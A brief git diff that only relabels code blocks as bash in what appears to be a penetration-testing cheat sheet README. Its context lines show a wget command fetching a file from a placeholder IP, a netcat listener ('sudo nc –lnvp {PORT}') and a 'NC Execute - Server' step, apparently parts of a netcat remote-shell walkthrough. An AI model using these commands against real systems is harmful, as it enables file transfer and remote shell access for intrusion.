diff --git a/README.md b/README.md index 9ba3d10..49ff89c 100644 --- a/README.md +++ b/README.md @@ -407,7 +407,7 @@ wget http://{IP ADDRESS}/{FILE} -outfile {FILE}
-``` +```bash # About: A command used to listen to requests from a defined port # Download: Pre-installed on Kali Linux @@ -421,7 +421,7 @@ sudo nc –lnvp {PORT} ## NC Execute - Server [STEP 2] -``` +```bash # With Netcat installed # Usage - Windows